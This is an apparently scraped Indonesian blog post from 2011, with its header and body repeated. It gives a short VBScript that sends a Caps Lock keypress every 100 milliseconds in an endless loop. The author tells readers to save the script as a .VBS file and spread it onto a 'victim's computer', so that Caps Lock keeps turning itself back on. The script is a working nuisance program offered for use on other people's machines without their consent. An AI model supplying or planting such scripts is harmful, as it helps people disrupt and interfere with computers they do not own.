[+] Post Title :
[+] Date : Minggu, 25 September 2011
[+] Author : Alma'ruff audi
[+] Link : https://almaevolution.blogspot.com/2011/09/trik-membuat-tombol-caps-lock-menyala.html
[+] Type : trick NOTEpad
TRIK - Membuat Tombol Caps Lock menyala terus-menerus
[+] Date : Minggu, 25 September 2011
[+] Author : Alma'ruff audi
[+] Link : https://almaevolution.blogspot.com/2011/09/trik-membuat-tombol-caps-lock-menyala.html
[+] Type : trick NOTEpad
------------------------------------------------------------------
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
------------------------------------------------------------------
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna HIJAU di Notepad dengan nama : (sesuka hatimu).VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
------------------------------------------------------------------
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna HIJAU di Notepad dengan nama : (sesuka hatimu).VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)
0 komentar:
Posting Komentar